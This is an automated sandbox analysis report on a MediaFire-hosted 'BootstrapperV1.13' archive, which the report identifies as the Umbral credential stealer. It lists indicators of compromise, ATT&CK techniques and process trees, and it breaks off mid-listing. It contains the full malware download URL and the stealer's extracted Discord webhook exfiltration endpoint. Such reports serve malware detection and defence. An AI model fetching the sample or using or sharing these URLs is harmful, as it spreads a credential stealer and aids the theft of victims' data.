umbral | hxxps://www[.]mediafire[.]com/file/efs9bse0e0tm909/BootstrapperV1[.]13[.]rar/file

Analysis

max time kernel
1428s
max time network
1423s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
06-09-2024 19:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://www.mediafire.com/file/efs9bse0e0tm909/BootstrapperV1.13.rar/file

Score

10^/10

umbral credential_access discovery execution spyware stealer

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1267765278348152842/-kPKB4JdOggRN8137Je53csdEwdD1XV1iw7mGKhIQuAM7kIz_LwCjyjE2Ekxy7ebgeJr

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x001400000002347f-1790.dat	family_umbral
behavioral1/memory/3988-1792-0x000001E64B6B0000-0x000001E64B6F0000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 36 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2208	powershell.exe
3660	powershell.exe
1092	powershell.exe
4724	powershell.exe
784	powershell.exe
5640	powershell.exe
5328	powershell.exe
1044	powershell.exe
4788	powershell.exe
5360	powershell.exe
5772	powershell.exe
976	powershell.exe
5996	powershell.exe
5868	powershell.exe
6112	powershell.exe
3656	powershell.exe
3888	powershell.exe
3696	powershell.exe
3540	powershell.exe
4796	powershell.exe
3824	powershell.exe
5588	powershell.exe
4332	powershell.exe
4704	powershell.exe
5992	powershell.exe
5536	powershell.exe
5556	powershell.exe
2936	powershell.exe
3340	powershell.exe
5296	powershell.exe
5356	powershell.exe
2892	powershell.exe
3204	powershell.exe
4940	powershell.exe
5524	powershell.exe
5344	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	BootstrapperV1.13.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	BootstrapperV1.13.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	BootstrapperV1.13.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	BootstrapperV1.13.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	BootstrapperV1.13.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	BootstrapperV1.13.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	BootstrapperV1.13.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	BootstrapperV1.13.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	BootstrapperV1.13.exe

Executes dropped EXE 13 IoCs

pid	Process
3496	winrar-x64-701.exe
3644	winrar-x64-701.exe
4976	winrar-x64-701.exe
1512	winrar-x64-701.exe
3988	BootstrapperV1.13.exe
5268	BootstrapperV1.13.exe
5160	BootstrapperV1.13.exe
4340	BootstrapperV1.13.exe
1964	BootstrapperV1.13.exe
2468	BootstrapperV1.13.exe
4204	BootstrapperV1.13.exe
3188	BootstrapperV1.13.exe
5940	BootstrapperV1.13.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 18 IoCs

Web Service

T1102

flow	ioc
496	discord.com
514	discord.com
361	discord.com
407	discord.com
478	discord.com
479	discord.com
513	discord.com
535	discord.com
408	discord.com
461	discord.com
495	discord.com
552	discord.com
566	discord.com
567	discord.com
360	discord.com
462	discord.com
536	discord.com
553	discord.com

Looks up external IP address via web service 9 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
491	ip-api.com
354	ip-api.com
403	ip-api.com
450	ip-api.com
458	ip-api.com
509	ip-api.com
531	ip-api.com
548	ip-api.com
562	ip-api.com

Drops file in System32 directory 11 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat	svchost.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 18 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3572	PING.EXE
2904	PING.EXE
1216	cmd.exe
5308	PING.EXE
3092	cmd.exe
1656	cmd.exe
5336	PING.EXE
1928	cmd.exe
5536	cmd.exe
3740	cmd.exe
1440	PING.EXE
2416	cmd.exe
5364	PING.EXE
5636	cmd.exe
5556	PING.EXE
5580	PING.EXE
4664	cmd.exe
6032	PING.EXE

Detects videocard installed 1 TTPs 9 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
6136	wmic.exe
5180	wmic.exe
5364	wmic.exe
3532	wmic.exe
5484	wmic.exe
3400	wmic.exe
2352	wmic.exe
2080	wmic.exe
6076	wmic.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133701246810472141"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings	mspaint.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings	mspaint.exe

Runs ping.exe 1 TTPs 9 IoCs

Remote System Discovery

T1018

pid	Process
3572	PING.EXE
2904	PING.EXE
1440	PING.EXE
6032	PING.EXE
5308	PING.EXE
5556	PING.EXE
5580	PING.EXE
5336	PING.EXE
5364	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4396	chrome.exe
4396	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
2680	chrome.exe
3988	BootstrapperV1.13.exe
3988	BootstrapperV1.13.exe
2936	powershell.exe
2936	powershell.exe
2936	powershell.exe
976	powershell.exe
976	powershell.exe
976	powershell.exe
3888	powershell.exe
3888	powershell.exe
3888	powershell.exe
5036	powershell.exe
5036	powershell.exe
5036	powershell.exe
4796	powershell.exe
4796	powershell.exe
4796	powershell.exe
5176	msedge.exe
5176	msedge.exe
6056	msedge.exe
6056	msedge.exe
4416	msedge.exe
4416	msedge.exe
5268	BootstrapperV1.13.exe
5268	BootstrapperV1.13.exe
3340	powershell.exe
3340	powershell.exe
3340	powershell.exe
5996	powershell.exe
5996	powershell.exe
5996	powershell.exe
5992	powershell.exe
5992	powershell.exe
5992	powershell.exe
3740	powershell.exe
3740	powershell.exe
3740	powershell.exe
5536	powershell.exe
5536	powershell.exe
5536	powershell.exe
5160	BootstrapperV1.13.exe
5160	BootstrapperV1.13.exe
5296	powershell.exe
5296	powershell.exe
5296	powershell.exe
2208	powershell.exe
2208	powershell.exe
2208	powershell.exe
3696	powershell.exe
3696	powershell.exe
3696	powershell.exe
6104	powershell.exe
6104	powershell.exe
6104	powershell.exe
5084	mspaint.exe
5084	mspaint.exe
4712	mspaint.exe
4712	mspaint.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4552	OpenWith.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 25 IoCs

pid	Process
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
5416	chrome.exe
5416	chrome.exe
5416	chrome.exe
5416	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4396	chrome.exe
Token: SeCreatePagefilePrivilege	4396	chrome.exe
Token: SeShutdownPrivilege	4396	chrome.exe
Token: SeCreatePagefilePrivilege	4396	chrome.exe
Token: SeShutdownPrivilege	4396	chrome.exe
Token: SeCreatePagefilePrivilege	4396	chrome.exe
Token: SeShutdownPrivilege	4396	chrome.exe
Token: SeCreatePagefilePrivilege	4396	chrome.exe
Token: SeShutdownPrivilege	4396	chrome.exe
Token: SeCreatePagefilePrivilege	4396	chrome.exe
Token: SeShutdownPrivilege	4396	chrome.exe
Token: SeCreatePagefilePrivilege	4396	chrome.exe
Token: SeShutdownPrivilege	4396	chrome.exe
Token: SeCreatePagefilePrivilege	4396	chrome.exe
Token: SeShutdownPrivilege	4396	chrome.exe
Token: SeCreatePagefilePrivilege	4396	chrome.exe
Token: SeShutdownPrivilege	4396	chrome.exe
Token: SeCreatePagefilePrivilege	4396	chrome.exe
Token: SeShutdownPrivilege	4396	chrome.exe
Token: SeCreatePagefilePrivilege	4396	chrome.exe
Token: SeShutdownPrivilege	4396	chrome.exe
Token: SeCreatePagefilePrivilege	4396	chrome.exe
Token: SeShutdownPrivilege	4396	chrome.exe
Token: SeCreatePagefilePrivilege	4396	chrome.exe
Token: SeShutdownPrivilege	4396	chrome.exe
Token: SeCreatePagefilePrivilege	4396	chrome.exe
Token: SeShutdownPrivilege	4396	chrome.exe
Token: SeCreatePagefilePrivilege	4396	chrome.exe
Token: SeShutdownPrivilege	4396	chrome.exe
Token: SeCreatePagefilePrivilege	4396	chrome.exe
Token: SeShutdownPrivilege	4396	chrome.exe
Token: SeCreatePagefilePrivilege	4396	chrome.exe
Token: SeShutdownPrivilege	4396	chrome.exe
Token: SeCreatePagefilePrivilege	4396	chrome.exe
Token: SeShutdownPrivilege	4396	chrome.exe
Token: SeCreatePagefilePrivilege	4396	chrome.exe
Token: SeShutdownPrivilege	4396	chrome.exe
Token: SeCreatePagefilePrivilege	4396	chrome.exe
Token: SeShutdownPrivilege	4396	chrome.exe
Token: SeCreatePagefilePrivilege	4396	chrome.exe
Token: SeShutdownPrivilege	4396	chrome.exe
Token: SeCreatePagefilePrivilege	4396	chrome.exe
Token: SeShutdownPrivilege	4396	chrome.exe
Token: SeCreatePagefilePrivilege	4396	chrome.exe
Token: SeShutdownPrivilege	4396	chrome.exe
Token: SeCreatePagefilePrivilege	4396	chrome.exe
Token: SeShutdownPrivilege	4396	chrome.exe
Token: SeCreatePagefilePrivilege	4396	chrome.exe
Token: SeShutdownPrivilege	4396	chrome.exe
Token: SeCreatePagefilePrivilege	4396	chrome.exe
Token: SeShutdownPrivilege	4396	chrome.exe
Token: SeCreatePagefilePrivilege	4396	chrome.exe
Token: SeShutdownPrivilege	4396	chrome.exe
Token: SeCreatePagefilePrivilege	4396	chrome.exe
Token: SeShutdownPrivilege	4396	chrome.exe
Token: SeCreatePagefilePrivilege	4396	chrome.exe
Token: SeShutdownPrivilege	4396	chrome.exe
Token: SeCreatePagefilePrivilege	4396	chrome.exe
Token: SeShutdownPrivilege	4396	chrome.exe
Token: SeCreatePagefilePrivilege	4396	chrome.exe
Token: SeShutdownPrivilege	4396	chrome.exe
Token: SeCreatePagefilePrivilege	4396	chrome.exe
Token: SeShutdownPrivilege	4396	chrome.exe
Token: SeCreatePagefilePrivilege	4396	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
4396	chrome.exe
5416	chrome.exe
5416	chrome.exe
5416	chrome.exe
5416	chrome.exe
5416	chrome.exe
5416	chrome.exe
5416	chrome.exe
5416	chrome.exe
5416	chrome.exe
5416	chrome.exe
5416	chrome.exe
5416	chrome.exe
5416	chrome.exe
5416	chrome.exe
5416	chrome.exe
5416	chrome.exe
5416	chrome.exe
5416	chrome.exe
5416	chrome.exe
5416	chrome.exe
5416	chrome.exe
5416	chrome.exe

Suspicious use of SetWindowsHookEx 22 IoCs

pid	Process
3656	OpenWith.exe
3656	OpenWith.exe
3656	OpenWith.exe
3656	OpenWith.exe
3656	OpenWith.exe
3496	winrar-x64-701.exe
3496	winrar-x64-701.exe
3496	winrar-x64-701.exe
3644	winrar-x64-701.exe
3644	winrar-x64-701.exe
3644	winrar-x64-701.exe
4976	winrar-x64-701.exe
4976	winrar-x64-701.exe
4976	winrar-x64-701.exe
1512	winrar-x64-701.exe
1512	winrar-x64-701.exe
1512	winrar-x64-701.exe
1384	OpenWith.exe
5084	mspaint.exe
4280	OpenWith.exe
4712	mspaint.exe
4552	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4396 wrote to memory of 648	4396	chrome.exe	83
PID 4396 wrote to memory of 648	4396	chrome.exe	83
PID 4396 wrote to memory of 4812	4396	chrome.exe	84
PID 4396 wrote to memory of 4812	4396	chrome.exe	84
PID 4396 wrote to memory of 4812	4396	chrome.exe	84
PID 4396 wrote to memory of 4812	4396	chrome.exe	84
PID 4396 wrote to memory of 4812	4396	chrome.exe	84
PID 4396 wrote to memory of 4812	4396	chrome.exe	84
PID 4396 wrote to memory of 4812	4396	chrome.exe	84
PID 4396 wrote to memory of 4812	4396	chrome.exe	84
PID 4396 wrote to memory of 4812	4396	chrome.exe	84
PID 4396 wrote to memory of 4812	4396	chrome.exe	84
PID 4396 wrote to memory of 4812	4396	chrome.exe	84
PID 4396 wrote to memory of 4812	4396	chrome.exe	84
PID 4396 wrote to memory of 4812	4396	chrome.exe	84
PID 4396 wrote to memory of 4812	4396	chrome.exe	84
PID 4396 wrote to memory of 4812	4396	chrome.exe	84
PID 4396 wrote to memory of 4812	4396	chrome.exe	84
PID 4396 wrote to memory of 4812	4396	chrome.exe	84
PID 4396 wrote to memory of 4812	4396	chrome.exe	84
PID 4396 wrote to memory of 4812	4396	chrome.exe	84
PID 4396 wrote to memory of 4812	4396	chrome.exe	84
PID 4396 wrote to memory of 4812	4396	chrome.exe	84
PID 4396 wrote to memory of 4812	4396	chrome.exe	84
PID 4396 wrote to memory of 4812	4396	chrome.exe	84
PID 4396 wrote to memory of 4812	4396	chrome.exe	84
PID 4396 wrote to memory of 4812	4396	chrome.exe	84
PID 4396 wrote to memory of 4812	4396	chrome.exe	84
PID 4396 wrote to memory of 4812	4396	chrome.exe	84
PID 4396 wrote to memory of 4812	4396	chrome.exe	84
PID 4396 wrote to memory of 4812	4396	chrome.exe	84
PID 4396 wrote to memory of 4812	4396	chrome.exe	84
PID 4396 wrote to memory of 4804	4396	chrome.exe	85
PID 4396 wrote to memory of 4804	4396	chrome.exe	85
PID 4396 wrote to memory of 4540	4396	chrome.exe	86
PID 4396 wrote to memory of 4540	4396	chrome.exe	86
PID 4396 wrote to memory of 4540	4396	chrome.exe	86
PID 4396 wrote to memory of 4540	4396	chrome.exe	86
PID 4396 wrote to memory of 4540	4396	chrome.exe	86
PID 4396 wrote to memory of 4540	4396	chrome.exe	86
PID 4396 wrote to memory of 4540	4396	chrome.exe	86
PID 4396 wrote to memory of 4540	4396	chrome.exe	86
PID 4396 wrote to memory of 4540	4396	chrome.exe	86
PID 4396 wrote to memory of 4540	4396	chrome.exe	86
PID 4396 wrote to memory of 4540	4396	chrome.exe	86
PID 4396 wrote to memory of 4540	4396	chrome.exe	86
PID 4396 wrote to memory of 4540	4396	chrome.exe	86
PID 4396 wrote to memory of 4540	4396	chrome.exe	86
PID 4396 wrote to memory of 4540	4396	chrome.exe	86
PID 4396 wrote to memory of 4540	4396	chrome.exe	86
PID 4396 wrote to memory of 4540	4396	chrome.exe	86
PID 4396 wrote to memory of 4540	4396	chrome.exe	86
PID 4396 wrote to memory of 4540	4396	chrome.exe	86
PID 4396 wrote to memory of 4540	4396	chrome.exe	86
PID 4396 wrote to memory of 4540	4396	chrome.exe	86
PID 4396 wrote to memory of 4540	4396	chrome.exe	86
PID 4396 wrote to memory of 4540	4396	chrome.exe	86
PID 4396 wrote to memory of 4540	4396	chrome.exe	86
PID 4396 wrote to memory of 4540	4396	chrome.exe	86
PID 4396 wrote to memory of 4540	4396	chrome.exe	86
PID 4396 wrote to memory of 4540	4396	chrome.exe	86
PID 4396 wrote to memory of 4540	4396	chrome.exe	86
PID 4396 wrote to memory of 4540	4396	chrome.exe	86
PID 4396 wrote to memory of 4540	4396	chrome.exe	86

Views/modifies file attributes 1 TTPs 9 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4552	attrib.exe
4148	attrib.exe
4908	attrib.exe
2836	attrib.exe
5288	attrib.exe
1092	attrib.exe
5852	attrib.exe
5200	attrib.exe
4664	attrib.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://www.mediafire.com/file/efs9bse0e0tm909/BootstrapperV1.13.rar/file
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4396
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff8bcd0cc40,0x7ff8bcd0cc4c,0x7ff8bcd0cc58
  2⤵
  PID:648
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2020,i,10258336997194847128,9964121005674791177,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2016 /prefetch:2
  2⤵
  PID:4812
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1880,i,10258336997194847128,9964121005674791177,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2476 /prefetch:3
  2⤵
  PID:4804
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2120,i,10258336997194847128,9964121005674791177,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2592 /prefetch:8
  2⤵
  PID:4540
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3108,i,10258336997194847128,9964121005674791177,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3144 /prefetch:1
  2⤵
  PID:4908
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3116,i,10258336997194847128,9964121005674791177,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3316 /prefetch:1
  2⤵
  PID:2604
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4564,i,10258336997194847128,9964121005674791177,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4600 /prefetch:1
  2⤵
  PID:4152
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3128,i,10258336997194847128,9964121005674791177,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4556 /prefetch:1
  2⤵
  PID:2336
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=5220,i,10258336997194847128,9964121005674791177,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3324 /prefetch:1
  2⤵
  PID:1216
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5516,i,10258336997194847128,9964121005674791177,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5528 /prefetch:8
  2⤵
  PID:224
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=3392,i,10258336997194847128,9964121005674791177,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5540 /prefetch:1
  2⤵
  PID:1944
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4872,i,10258336997194847128,9964121005674791177,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3444 /prefetch:8
  2⤵
  PID:4080
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4868,i,10258336997194847128,9964121005674791177,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5112 /prefetch:1
  2⤵
  PID:2748
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4644,i,10258336997194847128,9964121005674791177,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4556 /prefetch:1
  2⤵
  PID:3296
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3336,i,10258336997194847128,9964121005674791177,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4960 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2680
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5796,i,10258336997194847128,9964121005674791177,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4680 /prefetch:1
  2⤵
  PID:180
- C:\Program Files\Google\Chrome\Application\chrome.exe
